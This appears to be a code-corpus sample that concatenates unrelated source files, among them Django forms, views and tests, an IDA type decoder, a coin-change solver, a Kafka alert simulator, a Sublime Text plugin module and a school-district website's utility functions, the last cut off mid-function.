code = forms.CharField(widget=forms.TextInput(attrs={
'class': 'form-control',
'placeholder': 'Promo code',
'aria-label': 'Recipient\'s username',
'aria-describedby': 'basic-addon2'
})) | 1.71875 | 2 |
prediction/FaceDetectMicroservice/secrets.py | anishapai/CombinedTechStack | 1 | 12769978 | <reponame>anishapai/CombinedTechStack
API_KEY = 'paste_your_api_key_here'
| 1 | 1 |
ATFGen/pida_types/tstr.py | goodwinxp/ida_info_code_gen | 1 | 12769979 | from abc_type import IdaTypes
from ida_types import IDA_TYPES
class IdaTStr(IdaTypes):
def __init__(self, ida_type=IDA_TYPES['str']):
self.ida_type = {'idt': ida_type, 'value': ''}
def decode(self, data):
count = ord(data[0])
offset = 1
        import ida_decoder
        for i in range(0, count):
            rbyte, value = ida_decoder.decode_hybrid_type(ida_type=data[offset:])
            offset += rbyte
            # 'value' starts out as a string, so accumulate by concatenation
            self.ida_type['value'] += value
return offset
def get_type(self):
return self.ida_type
def to_string(self, session):
return self.ida_type['value'] + '{ptr} {name}'
def from_dict(self, data):
self.ida_type = data
| 2.375 | 2 |
hackerrank/contests/zenhacks/bob.py | spradeepv/dive-into-python | 0 | 12769980 | """
Problem Statement
Bob is in a candy shop and wants to purchase his favorite candy, which he knows costs N dollars. He has an infinite number of 1,2,5,10,20,50, and 100 dollar bills in his pocket. Bob wants to know the number of different ways he can pay the N dollars for his candy.
Input Format
A single integer, N, which is the cost of Bob's candy.
Constraint
1 ≤ N ≤ 250
Output Format
Print an integer representing the number of different variations of how Bob can pay.
Sample Input1
5
Sample Output1
4
Sample Input2
7
Sample Output2
6
Explanation
Sample 1: 4 variants
(1,1,1,1,1)
(2,1,1,1)
(2,2,1)
(5)
Sample 2: 6 variants
(1,1,1,1,1,1,1)
(2,1,1,1,1,1)
(2,2,1,1,1)
(2,2,2,1)
(5,1,1)
(5,2)
"""
def subset_sum(number, l):
    # Classic coin-change counting DP: ways[j] is the number of ways to pay
    # amount j using the denominations processed so far.
    ways = [0] * (number + 1)
    ways[0] = 1  # one way to pay nothing: use no bills
    for n in l:
        for j in xrange(n, number + 1):
            ways[j] += ways[j - n]
    return ways[number]
n = int(raw_input())
print subset_sum(n, [1, 2, 5, 10, 20, 50, 100])
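# Quick checks against the samples in the docstring above:
# subset_sum(5, [1, 2, 5, 10, 20, 50, 100]) == 4
# subset_sum(7, [1, 2, 5, 10, 20, 50, 100]) == 6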
| 3.796875 | 4 |
RecSearch/Tests/DataInterfaces/Splitters/Test_query.py | matthew-kimm/RecSearch | 0 | 12769981 | <filename>RecSearch/Tests/DataInterfaces/Splitters/Test_query.py
from RecSearch.DataInterfaces.Splitters.query import IXQuerySplit
from RecSearch.Tests.DataInterfaces.Splitters.SharedTestSplitter import SharedTestSplitter
import unittest
import pandas as pd
class TestQuerySplitter(SharedTestSplitter, unittest.TestCase):
def setUp(self):
self.Interface = IXQuerySplit()
self.data = pd.DataFrame(data=[['Math', 2017, 3.6],
['Computer Science', 2017, 3.8],
['English', 2019, 2.7],
['Math', 2018, 2.0],
['Art', 2018, 3.1],
['Engineering', 2017, 3.4]],
columns=['Department', 'Year', 'GPA'],
index=[0, 1, 2, 3, 4, 5])
self.data17 = self.data.loc[[0, 1, 5]]
self.data1819 = self.data.loc[[2, 3, 4]]
self.result = {'train': self.data17, 'test': self.data1819}
def test_interface(self):
self.assertTrue(self.compare_dict_dataframes(self.result,
self.Interface.iget_splitter(self.data,
**{'train': 'Year in [2017]',
'test': 'Year in [2018, 2019]'})))
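# For reference, IXQuerySplit evaluates pandas query strings, e.g.
# self.data.query('Year in [2017]') keeps the rows whose Year column is 2017,
# which is why the expected train/test splits above are rows [0, 1, 5]
# and [2, 3, 4].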
| 2.609375 | 3 |
pypoptools/pypoptesting/tests/pop_e2e.py | black0rwhite/alt-integration-cpp | 0 | 12769982 | """
Test with multiple nodes, and multiple PoP endorsements, checking to make sure nodes stay in sync.
"""
import time
from ..framework.test_framework import PopIntegrationTestFramework
from ..framework.pop_util import endorse_block, mine_until_pop_enabled
from ..framework.sync_util import start_all, connect_all, sync_all
class PopE2E(PopIntegrationTestFramework):
def set_test_params(self):
self.num_nodes = 2
def setup_nodes(self):
start_all(self.nodes)
mine_until_pop_enabled(self.nodes[0])
connect_all(self.nodes)
sync_all(self.nodes)
def run_test(self):
from pypoptools.pypopminer import MockMiner, PublicationData
apm = MockMiner()
self._assert_nodes_peer_info()
vbk_blocks_amount = 100
self.log.info("generate vbk blocks on node0, amount {}".format(vbk_blocks_amount))
vbk_blocks = []
for i in range(vbk_blocks_amount):
vbk_blocks.append(apm.mineVbkBlocks(1))
assert len(vbk_blocks) == vbk_blocks_amount
vtbs_amount = 20
self.log.info("generate vtbs on node0, amount {}".format(vtbs_amount))
for i in range(vtbs_amount):
apm.endorseVbkBlock(apm.vbkTip, apm.btcTip.getHash(), 1)
self.nodes[0].generate(nblocks=10)
last_block = self.nodes[0].getblockcount()
assert last_block >= 5
self.log.info("endorse {} alt block".format(last_block - 5))
endorse_block(self.nodes[0], apm, last_block - 5)
self._assert_nodes_peer_info()
containing_block_hash = self.nodes[0].generate(nblocks=1)[0]
containing_block = self.nodes[0].getblock(containing_block_hash)
assert len(containing_block.containingVTBs) == vtbs_amount
assert len(containing_block.containingVBKs) == vbk_blocks_amount + vtbs_amount + 1
assert last_block >= 6
self.log.info("endorse {} alt block".format(last_block - 6))
endorse_block(self.nodes[0], apm, last_block - 6)
self._assert_nodes_peer_info()
self.nodes[0].generate(nblocks=1)
time.sleep(5)
self.log.info("sync all nodes")
sync_all(self.nodes)
self._assert_nodes_peer_info()
def _assert_nodes_peer_info(self):
self._assert_node_peer_info(self.nodes[0])
self._assert_node_peer_info(self.nodes[1])
def _assert_node_peer_info(self, node):
peer_info = node.getpeerinfo()
assert len(peer_info) == 1
assert peer_info[0].banscore == 0
| 2.265625 | 2 |
blog/articles/urls.py | dotHashemi/django-practice | 1 | 12769983 | <filename>blog/articles/urls.py<gh_stars>1-10
from django.urls import path
from articles import views
urlpatterns = [
path('', views.index, name='articles.index'),
path('<int:id>/', views.show, name='articles.show'),
]
| 1.875 | 2 |
hyrodactil/tests/public/test_views.py | hizardapp/Hizard | 1 | 12769984 | <gh_stars>1-10
import os
from django.core import mail
from django.core.urlresolvers import reverse
from django_webtest import WebTest
from ..factories._accounts import UserFactory
from ..factories._companysettings import (
InterviewStageFactory
)
from ..factories._openings import OpeningWithQuestionFactory
from applications.models import Application, ApplicationAnswer
from public.models import Interest
from tests.utils import subdomain_get, career_site_get, career_site_post
from customisable_emails.models import EmailTemplate
class PublicViewsTests(WebTest):
def test_anonymous_can_access_landing_page(self):
url = reverse('public:landing-page')
response = subdomain_get(self.app, url)
self.assertEqual(response.status_code, 200)
def test_anonymous_can_add_email(self):
url = reverse('public:landing-page')
form = subdomain_get(self.app, url).form
form['email'] = '<EMAIL>'
form.submit()
self.assertEqual(Interest.objects.count(), 1)
def test_invalid_interest_email_error(self):
url = reverse('public:landing-page')
form = subdomain_get(self.app, url).form
form['email'] = 'astonmartin.com'
response = form.submit().follow()
self.assertEqual(Interest.objects.count(), 0)
self.assertContains(response, 'invalid')
class ApplicationViewsTests(WebTest):
def setUp(self):
self.user = UserFactory()
self.opening = OpeningWithQuestionFactory(company=self.user.company)
def test_get_list_openings(self):
url = reverse('public:opening-list')
self.user.company.subdomain = self.user.company.subdomain.title()
self.user.company.save()
page = career_site_get(self.app, url, self.user.company.subdomain)
self.assertEqual(page.status_code, 200)
self.assertContains(page, self.opening.title)
def test_get_list_openings_inexisting_subdomain(self):
url = reverse('public:opening-list')
self.app.get(url, headers=dict(Host="tralala.h.com"), status=404)
def test_get_list_openings_with_an_unpublished_one(self):
OpeningWithQuestionFactory(
title="Dreamer",
company=self.user.company,
published_date=None
)
url = reverse('public:opening-list')
page = career_site_get(self.app, url, self.user.company.subdomain)
self.assertNotContains(page, 'Dreamer')
def test_get_application_form(self):
url = reverse('public:apply', args=(self.opening.id,))
page = career_site_get(self.app, url, self.user.company.subdomain)
self.assertEqual(page.status_code, 200)
self.assertContains(page, self.opening.company.name)
self.assertContains(page, self.opening.description)
self.assertContains(page, self.opening.title)
self.assertContains(
page, self.opening.questions.all()[0].title
)
def test_valid_post_application_form(self):
stage = InterviewStageFactory(tag='RECEIVED', company=self.user.company)
url = reverse('public:apply', args=(self.opening.id,))
EmailTemplate.objects.create(
company=self.user.company,
code="application_received",
subject="Thank your for applying for {{ opening }}",
body="Dear {{applicant_first_name}}, Best regards",
)
form = career_site_get(self.app, url, self.user.company.subdomain).form
form['first_name'] = 'Bilbon'
form['last_name'] = 'Sacquet'
form['email'] = '<EMAIL>'
# name of file, content of file
form['resume'] = 'bilbon_cv.pdf', "My resume"
form['question-1'] = 'Lalala'
response = form.submit().follow()
self.assertEqual(
response.request.path,
reverse('public:confirmation', args=(self.opening.id,))
)
self.assertEqual(Application.objects.count(), 1)
application = Application.objects.get(id=1)
applicant = application.applicant
self.assertEqual(applicant.first_name, 'Bilbon')
self.assertEqual(applicant.resume.url,
'/media/resumes/%d/bilbon_cv.pdf' % self.opening.company.id)
self.assertEqual(application.current_stage, stage)
self.assertEqual(len(mail.outbox), 1)
email, = mail.outbox
self.assertTrue("Bilbon" in email.body)
self.assertTrue(self.opening.title in email.subject)
        # the factory opening has a single question, so one answer is recorded
self.assertEqual(ApplicationAnswer.objects.count(), 1)
        # Clean up the resume file we just created
os.unlink(applicant.resume.path)
def test_invalid_post_application_form(self):
url = reverse('public:apply', args=(self.opening.id,))
form = career_site_get(self.app, url, self.user.company.subdomain).form
form['first_name'] = 'Software Developer'
form['last_name'] = '<NAME>.'
form['question-1'] = ''
response = form.submit()
self.assertEqual(response.status_code, 200)
self.assertEqual(Application.objects.count(), 0)
def test_get_apply_form_unpublished(self):
opening = OpeningWithQuestionFactory(company=self.user.company, published_date=None)
url = reverse('public:apply', args=(opening.id,))
career_site_get(self.app, url, self.user.company.subdomain, status=404)
def test_get_inexisting_opening_form(self):
url = reverse('public:apply', args=(42,))
career_site_get(self.app, url, self.user.company.subdomain, status=404)
def test_post_inexisting_opening_form(self):
url = reverse('public:apply', args=(42,))
career_site_post(self.app, url, self.user.company.subdomain, status=404)
def test_post_unpublished_opening_form(self):
opening = OpeningWithQuestionFactory(company=self.user.company, published_date=None)
url = reverse('public:apply', args=(opening.id,))
career_site_post(self.app, url, self.user.company.subdomain, status=404)
def test_get_application_confirmation_opening_not_exist(self):
url = reverse('public:confirmation', args=(42,))
career_site_get(self.app, url, self.user.company.subdomain, status=404)
class EmbedViewsTest(WebTest):
def setUp(self):
self.user = UserFactory()
self.opening = OpeningWithQuestionFactory(company=self.user.company)
def test_basic_opening_embedding(self):
url = reverse('public:embed')
response = career_site_get(self.app, url, self.user.company.subdomain.lower())
self.assertEqual(response.status_code, 200)
self.assertContains(response, self.opening.title)
| 2.25 | 2 |
src/printBoard.py | Harry-Hopkinson/dots-and-boxes | 1 | 12769985 | <filename>src/printBoard.py<gh_stars>1-10
from checkDraw import *
from checkWin import *
from constants import *
from endGame import *
from play import *
from playAgain import *
from playerOneMove import *
from playerTwoMove import *
from board import *
def printBoard(board):
for i in range(len(board)):
for j in range(len(board[i])):
if board[i][j] == 0:
print(".", end="")
elif board[i][j] == 1:
print("x", end="")
elif board[i][j] == -1:
print("o", end="")
print()
print(hash)
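# Quick illustrative call (3x3 toy board using the encoding above:
# 0 empty, 1 -> 'x', -1 -> 'o'):
# printBoard([[0, 1, 0], [-1, 0, 1], [0, 0, -1]])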
| 3.34375 | 3 |
supermarketToexpress/views.py | NotEnterprising/DATABASE_supermarket | 0 | 12769986 | <filename>supermarketToexpress/views.py
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.shortcuts import render, HttpResponseRedirect, redirect
from supermarket.models import Supermarket
from .models import SupermarketToExpress
from .forms import CreateSupermarketToExpress, EditSupermarketToExpress
@login_required
def create_result(request):
supermarkets = Supermarket.objects.all()
if request.method == 'POST':
# after visiting the second page
if 'finish' in request.POST:
form = CreateSupermarketToExpress(request.POST)
if form.is_valid():
express = form.cleaned_data['express']
supermarkets = request.POST['supermarkets']
results = []
for supermarket in supermarkets.split(','):
sup = Supermarket.objects.get(pk=supermarket)
check = SupermarketToExpress.objects.filter(supermarket=sup, express=express).first()
if not check:
results.append(
SupermarketToExpress(
express=express,
supermarket=sup
)
)
SupermarketToExpress.objects.bulk_create(results)
return redirect('view-SupermarketToExpress')
# after choosing students
id_list = request.POST.getlist('supermarkets')
if id_list:
form = CreateSupermarketToExpress()
supermarket_list = ','.join(id_list)
return render(request, 'create_supermarketToexpress_page2.html',
{"supermarkets": supermarket_list, "form": form, "count": len(id_list)})
else:
            messages.warning(request, "You did not select any supermarkets")
return render(request, 'create_supermarketToexpress.html', {"supermarkets": supermarkets})
@login_required
def edit_results(request):
if request.method == 'POST':
form = EditSupermarketToExpress(request.POST)
if form.is_valid():
form.save()
            messages.success(request, 'Deleted successfully')
return redirect('edit-SupermarketToExpress')
else:
results = SupermarketToExpress.objects.all()
form = EditSupermarketToExpress(queryset=results)
return render(request, 'edit_supermarketToexpress.html', {"formset": form})
@login_required
def all_results_view(request):
results = SupermarketToExpress.objects.all()
bulk = {}
for result in results:
expresss = []
for express in results:
if express.supermarket == result.supermarket:
expresss.append(express.express)
bulk[result.supermarket.id] = {
"supermarket": result.supermarket,
"expresses": expresss,
}
context = {
"results": bulk
}
return render(request, 'all_supermarketToexpress.html', context)
| 2.296875 | 2 |
mechlib/filesys/_rct.py | sjklipp/mechdriver | 0 | 12769987 | """ rct cnf fs because don't knwo where else to put it and avoid
circular imports
"""
from mechanalyzer.inf import thy as tinfo
from mechlib.filesys._build import build_fs
from mechlib.filesys.mincnf import min_energy_conformer_locators
def rcts_cnf_fs(rct_infos, thy_dct, es_keyword_dct, run_prefix, save_prefix):
""" set reactant filesystem stuff
"""
ini_method_dct = thy_dct.get(es_keyword_dct['inplvl'])
ini_thy_info = tinfo.from_dct(ini_method_dct)
rct_cnf_fs = ()
for rct_info in rct_infos:
mod_ini_thy_info = tinfo.modify_orb_label(
ini_thy_info, rct_info)
# Build filesys for ini thy info
ini_cnf_run_fs, ini_cnf_save_fs = build_fs(
run_prefix, save_prefix, 'CONFORMER',
spc_locs=rct_info,
thy_locs=mod_ini_thy_info[1:])
ini_loc_info = min_energy_conformer_locators(
ini_cnf_save_fs, mod_ini_thy_info)
ini_min_cnf_locs, ini_min_cnf_path = ini_loc_info
# Create run fs if that directory has been deleted to run the jobs
ini_cnf_run_fs[-1].create(ini_min_cnf_locs)
rct_cnf_fs += ((ini_cnf_run_fs, ini_cnf_save_fs,
ini_min_cnf_locs, ini_min_cnf_path),)
return rct_cnf_fs
__all__ = [
    'rcts_cnf_fs'
]
| 1.992188 | 2 |
floo/editor.py | barrasch/floobits-sublime | 124 | 12769988 | import sys
import os
try:
import sublime
except Exception:
pass
NEW_ACCOUNT_TXT = '''Welcome {username}!\n\nYou're all set to collaborate. You should check out our docs at https://{host}/help/plugins/sublime#usage.
You must run 'Floobits - Complete Sign Up' so you can log in to the website.'''
LINKED_ACCOUNT_TXT = '''Welcome {username}!\n\nYou are all set to collaborate.
You may want to check out our docs at https://{host}/help/plugins/sublime#usage'''
def name():
if sys.version_info < (3, 0):
py_version = 2
else:
py_version = 3
return 'Sublime Text %s' % py_version
def codename():
return 'sublime'
def ok_cancel_dialog(dialog):
return sublime.ok_cancel_dialog(dialog)
def error_message(msg):
sublime.error_message(msg)
def status_message(msg):
sublime.status_message(msg)
def platform():
return sublime.platform()
def set_timeout(f, timeout):
sublime.set_timeout(f, timeout)
def call_timeouts():
return
def message_dialog(msg):
sublime.message_dialog(msg)
def open_file(file):
win = sublime.active_window()
if win:
win.open_file(file)
def get_line_endings(path=None):
ending = sublime.load_settings('Preferences.sublime-settings').get('default_line_ending')
if ending == 'system':
return os.linesep
if ending == 'windows':
return '\r\n'
return '\n'
def select_auth(*args):
window, auths, cb = args
if not auths:
return cb(None)
auths = dict(auths)
for k, v in auths.items():
v['host'] = k
if len(auths) == 1:
return cb(list(auths.values())[0])
opts = [[h, 'Connect as %s' % a.get('username')] for h, a in auths.items()]
opts.append(['Cancel', ''])
def on_account(index):
if index < 0 or index >= len(auths):
            # the last entry in opts (appended above) is Cancel; -1 means
            # the panel was dismissed
return cb(None)
host = opts[index][0]
return cb(auths[host])
flags = 0
if hasattr(sublime, 'KEEP_OPEN_ON_FOCUS_LOST'):
flags |= sublime.KEEP_OPEN_ON_FOCUS_LOST
return window.show_quick_panel(opts, on_account, flags)
| 2.359375 | 2 |
supervisord_dependent_startup/tests/__init__.py | bendikro/ordered-startup-supervisord | 54 | 12769989 | from __future__ import print_function
import os
from supervisord_dependent_startup.supervisord_dependent_startup import (DependentStartup,
DependentStartupError,
get_all_configs,
process_states, Service,
ServiceOptions,
ServicesHandler, xmlrpclib)
from .log_utils import setup_tests_logging
__all__ = ['DependentStartup', 'ServiceOptions', 'DependentStartupError', 'Service',
'ServicesHandler', 'get_all_configs', 'process_states', 'xmlrpclib']
setup_tests_logging()
valid_booleans = {'true': True, 'True': True, 'TRUE': True, 't': True, '1': True}
cleanup_tmp_dir = os.environ.get('CLEANUP_TESTS', "True") in valid_booleans
# Name of directory to store supervisor config files. If unset, a random value is used
test_tmp_dir = os.environ.get('TEST_TMP_DIR', None)
| 2.046875 | 2 |
Python/Loops/loops.py | boneskewer69/ifis | 0 | 12769990 | <gh_stars>0
x = 1
while True:
x = input("Number:\n> ")
if int(x) == 0:
break
| 3.15625 | 3 |
bin/simulate_stream.py | astrolabsoftware/fink-alert-simulator | 0 | 12769991 | #!/usr/bin/env python
# Copyright 2019-2022 AstroLab Software
# Author: <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Simulate batches of alerts coming from ZTF or ELaSTICC.
"""
import argparse
import os
import sys
import glob
import time
import asyncio
import gzip
import numpy as np
from fink_alert_simulator import alertProducer
from fink_alert_simulator import avroUtils
from fink_alert_simulator.parser import getargs
def main():
parser = argparse.ArgumentParser(description=__doc__)
args = getargs(parser)
# Configure producer connection to Kafka broker
conf = {'bootstrap.servers': args.servers}
streamproducer = alertProducer.AlertProducer(
args.topic, schema_files=None, **conf)
# Scan for avro files
root = args.datasimpath
# Grab data stored on disk
files = glob.glob(os.path.join(root, "*.avro*"))
# Number of observations, and total number of alerts to send.
nobs = args.nobservations
poolsize = args.nalerts_per_obs * nobs
if nobs == -1:
# Take all alerts available
nobs = int(len(files) / float(args.nalerts_per_obs)) + 1
poolsize = args.nalerts_per_obs * nobs
msg = """
All {} alerts to be sent (nobservations=-1), corresponding
to {} observations ({} alerts each).
""".format(len(files), nobs, args.nalerts_per_obs)
print(msg)
elif len(files) < poolsize:
# Send only available alerts
nobs = int(len(files) / float(args.nalerts_per_obs)) + 1
msg = """
You ask for more data than you have!
Number of alerts on disk ({}): {}
Number of alerts required (nalerts_per_obs * nobservations): {}
Hence, we reduced the number of observations to {}.
""".format(root, len(files), poolsize, nobs)
print(msg)
print('Total alert available ({}): {}'.format(root, len(files)))
print('Total alert to be sent: {}'.format(poolsize))
# Break the alert list into observations
files = np.array_split(files[:poolsize], nobs)[:nobs]
# Starting time
t0 = time.time()
print("t0: {}".format(t0))
def send_visit(list_of_files):
""" Send all alerts of an observation for publication in Kafka
Parameters
----------
list_of_files: list of str
List with filenames containing the alert (avro file). Alerts
can be gzipped, but the extension should be
explicit (`avro` or `avro.gz`).
"""
print('Observation start: t0 + : {:.2f} seconds'.format(
time.time() - t0))
# Load alert contents
startstop = []
for index, fn in enumerate(list_of_files):
if fn.endswith('avro'):
copen = lambda x: open(x, mode='rb')
elif fn.endswith('avro.gz'):
copen = lambda x: gzip.open(x, mode='rb')
else:
msg = """
Alert filename should end with `avro` or `avro.gz`.
Currently trying to read: {}
""".format(fn)
raise NotImplementedError(msg)
with copen(fn) as file_data:
# Read the data
data = avroUtils.readschemadata(file_data)
# Read the Schema
schema = data.schema
# assuming one record per data
record = next(data)
if index == 0 or index == len(list_of_files) - 1:
if args.to_display != 'None':
fields = args.to_display.split(',')
to_display = record[fields[0]]
for field_ in fields[1:]:
to_display = to_display[field_]
startstop.append(to_display)
streamproducer.send(record, alert_schema=schema, encode=True)
if args.to_display != 'None':
print('{} alerts sent ({} to {})'.format(len(
list_of_files),
startstop[0],
startstop[1]))
# Trigger the producer
streamproducer.flush()
loop = asyncio.get_event_loop()
asyncio.ensure_future(
alertProducer.schedule_delays(
loop,
send_visit,
files,
interval=args.tinterval_kafka))
loop.run_forever()
loop.close()
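# Illustration of the batching performed by np.array_split above
# (toy file names):
# >>> np.array_split(['a1', 'a2', 'a3', 'a4'], 2)
# [array(['a1', 'a2'], dtype='<U2'), array(['a3', 'a4'], dtype='<U2')]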
if __name__ == "__main__":
main()
| 2.109375 | 2 |
array_processing/__init__.py | uafgeotools/array_processing | 9 | 12769992 | <gh_stars>1-10
from . import algorithms
from . import tools
| 1.03125 | 1 |
apps/common/functions.py | iamjdcollins/districtwebsite | 0 | 12769993 | <filename>apps/common/functions.py
import os
import shutil
import re
import uuid
from urllib.parse import urlparse, urlsplit, urlunsplit
from django.conf import settings
from django.apps import apps
from django.db.models import Q
from django.core.mail import EmailMessage
from django.contrib.auth import get_permission_codename
from guardian.shortcuts import get_perms
from django.core.exceptions import FieldDoesNotExist
from django.utils import timezone
from datetime import timedelta
from ckeditor.fields import RichTextField
# Required for response change
import base64
from django.utils.translation import ugettext as _
from django.utils.encoding import force_text
from django.utils.html import format_html
from django.http import HttpResponseRedirect
from django.utils.http import urlquote
from django.contrib import messages
from django.contrib.sites.models import Site
from multisite.models import Alias
from django.contrib.admin.templatetags.admin_urls import add_preserved_filters
from pilkit.utils import suggest_extension
from threading import Thread
from collections import OrderedDict
def multisite_fallback_view(request):
pass
def contactmessage_confirm(self):
email = EmailMessage(
'THANK YOU: ' + self.message_subject,
('<p>We have received your message. '
'We will get back to you shortly.</p>'
'<br><p><strong>Original Message</strong>'
'</p><br><p>' + self.your_message + '</p>'),
'Salt Lake City School District <<EMAIL>>',
[self.your_email],
reply_to=['<EMAIL>'],
headers={'Message-ID': str(self.pk) + '-' + str(uuid.uuid4())[0:8]},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def contactmessage_message(self):
email = EmailMessage(
'WEBSITE CONTACT: ' + self.message_subject,
('<p><strong>From:</strong> {0}: {1}</p>'
'<p><strong>To:</strong> {2}</p><p><strong>Page:</strong> '
'<a href="https://{5}{3}">https://{5}'
'{3}</a></p><p><strong>Message:</strong><br>{4}</p>').format(
self.your_name,
self.your_email,
self.primary_contact.email,
self.parent.url,
self.your_message,
get_domain(self.site),
),
'"{0}" <{1}>'.format(self.your_name, self.your_email),
[self.primary_contact.email],
bcc=['<EMAIL>'],
reply_to=[self.your_email],
headers={
'Message-ID': str(self.pk) + '-' + str(uuid.uuid4())[0:8],
'Sender': ('Salt Lake City School District'
'<<EMAIL>>'),
},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def customerror_emailadmins(subject, message):
email = EmailMessage(
subject,
message,
'Salt Lake City School District <<EMAIL>>',
['<EMAIL>'],
reply_to=['<EMAIL>'],
headers={
'Message-ID': str(uuid.uuid4()),
},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def urlchanged_email(self, oldurl):
email = EmailMessage(
        'Website URL Changed: App {0} Type {1}'.format(
self.node_type, self.content_type),
('<p><strong>Previous URL:</strong> ' + oldurl + '</p>'
'<p><strong>New URL:</strong> ' + self.url + '</p>'),
'Salt Lake City School District <<EMAIL>>',
['<EMAIL>'],
reply_to=['<EMAIL>@slcschools.org'],
headers={'Message-ID': str(self.pk) + '-' + str(uuid.uuid4())[0:8]},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def filepath_email(self, oldpath, newpath):
email = EmailMessage(
'File Path Changed: App {0} Type {1}'.format(
self.parent.node_type, self.parent.content_type),
('<p><strong>Previous Path:</strong> ' + oldpath + '</p>'
'<p><strong>New Path:</strong> ' + newpath + '</p>'),
'Salt Lake City School District <<EMAIL>>',
['<EMAIL>'],
reply_to=['<EMAIL>'],
headers={'Message-ID': str(self.pk) + '-' + str(uuid.uuid4())[0:8]},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def failed_saml_login_email(username):
email = EmailMessage(
'Failed SAML Login',
'An attempt to login via SAML has failed for username: {0}'.format(
username
),
'Salt Lake City School District <<EMAIL>>',
['<EMAIL>'],
reply_to=['<EMAIL>'],
headers={'Message-ID': str(uuid.uuid4())},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def findfileext_media(media):
media = media.split('/')[-1:]
return os.path.splitext(media[0])
def urlclean_fileext(fileext):
return re.sub(
'-+', '-', re.sub(r'([\s+])', '-', re.sub(
r'([^.a-z0-9\s-])', '', fileext.lower())))
def urlclean_objname(objname):
return re.sub(
'-+', '-', re.sub(r'([\s+])', '-', re.sub(
r'([^a-z0-9\s-])', '', objname.lower())))
def urlclean_remdoubleslashes(objname):
return re.sub('/+', '/', objname.lower())
def silentdelete_media(media):
try:
if os.path.isfile(media):
os.remove(media)
elif os.path.isdir(media):
shutil.rmtree(media, ignore_errors=True)
except OSError:
pass
def silentmove_media(oldpath, newpath):
try:
        if not (os.path.isdir(oldpath) and os.path.isdir(newpath)):
f = open('/tmp/movingfile.txt', 'a')
f.write('Moving: ' + oldpath + ' To: ' + newpath + '\n')
f.close()
shutil.move(oldpath, newpath)
else:
try:
f = open('/tmp/movingfile.txt', 'a')
f.write('Removing: ' + oldpath + '\n')
f.close()
os.rmdir(oldpath)
except OSError:
pass
except OSError:
pass
def has_add_permission(self, request, obj=None):
# Prevent showing the Save and Add Another Option
if request.path.split('/')[-2:][0] == 'change':
return False
if request.user.has_perm(
self.model._meta.app_label + '.' + get_permission_codename(
'add', self.model._meta)):
return True
elif request.user.groups.filter(name='Website Managers'):
return True
elif request.site.dashboard_sitepublisher_site.filter(account=request.user.pk):
return True
elif obj:
if get_permission_codename(
'add', self.model._meta) in get_perms(request.user, obj):
return True
return False
def has_change_permission(self, request, obj=None):
if self is not None:
# Check for regular global model permission
if request.user.has_perm(
self.model._meta.app_label + '.' + get_permission_codename(
'change', self.model._meta)):
return True
elif request.user.groups.filter(name='Website Managers'):
return True
elif request.site.dashboard_sitepublisher_site.filter(account=request.user.pk):
return True
if obj:
if request.user.is_authenticated:
if request.user.pk in can_edit_page(obj):
return True
# if request.user.groups.filter(name='Website Managers'):
# return True
# elif request.site.dashboard_sitepublisher_site.filter(account=request.user.pk):
# return True
# if obj.has_permissions:
# # Check for object level permission through Guardian
# if get_permission_codename(
# 'change', obj._meta) in get_perms(request.user, obj):
# return True
# else:
# node = objectfindnode(obj)
# permission_point = nodefindobject(
# node.get_ancestors().filter(has_permissions=True).last())
# if get_permission_codename(
# 'change', permission_point._meta) in get_perms(
# request.user, permission_point):
# return True
return False
def has_delete_permission(self, request, obj=None):
if request.user.has_perm(
self.model._meta.app_label + '.' + get_permission_codename(
'trash', self.model._meta)):
return True
elif request.user.groups.filter(name='Website Managers'):
return True
elif obj:
if obj.has_permissions:
# Check for object level permission through Guardian
if get_permission_codename(
'trash', self.model._meta) in get_perms(request.user, obj):
return True
else:
node = objectfindnode(obj)
permission_point = nodefindobject(
node.get_ancestors().filter(has_permissions=True).last())
if get_permission_codename(
'trash', permission_point._meta) in get_perms(
request.user, permission_point):
return True
return False
def has_add_permission_inline(self, request, obj=None):
# Allow if object is new (should always be new)
if obj is None:
return True
return False
def has_change_permission_inline(self, request, obj=None):
return True
def has_delete_permission_inline(self, request, obj=None):
return True
def modeltrash(self, *args, **kwargs):
if self.deleted == 0:
self.deleted = True
self.save()
else:
super(self._meta.model, self).delete()
def movechildren(self):
children = self.get_children()
for child in children:
if child.content_type == 'Board':
child.board.save()
elif child.content_type == 'BoardSubPage':
child.boardsubpage.save()
# Upload Image Functions
def image_upload_to(instance, filename):
original_file, original_extension = findfileext_media(filename)
full_path = '{0}{1}'.format(
instance.pk,
original_extension,
)
full_path = full_path.lower()
if not instance.image_file._committed:
silentdelete_media(settings.MEDIA_ROOT + '/' + full_path)
return full_path
# Upload File Functions
def file_upload_to(instance, filename):
original_file, original_extension = findfileext_media(filename)
full_path = '{0}{1}'.format(
instance.pk,
original_extension,
)
full_path = full_path.lower()
if not instance.file_file._committed:
silentdelete_media(settings.MEDIA_ROOT + '/' + full_path)
return full_path
def precinct_map_upload_to(instance, filename):
pass
# Save Content Functions
def modelsave(self, *args, **kwargs):
if not self.site:
if self.parent:
self.site = self.parent.site
else:
raise Exception('site not set for object. cannot be saved.')
Node = apps.get_model('objects', 'node')
User = apps.get_model('objects', 'user')
Alias = apps.get_model('multisite', 'alias')
# Is this a new instance?
is_new = self._state.adding
# Set deleted prefix
is_deleted = '_' if self.deleted is True else ''
# Set UUID if None
self.uuid = self.uuid if self.uuid else uuid.uuid4()
# Set original date on event
try:
if self._meta.get_field('originaldate'):
if (not self.originaldate) and self.startdate:
self.originaldate = self.startdate
self.originalinstance = len(self._meta.model.objects.filter(
originaldate=self.originaldate)) + 1
except FieldDoesNotExist:
pass
# Create Parent
if self.PARENT_TYPE:
creator = User.objects.get(username='<EMAIL>')
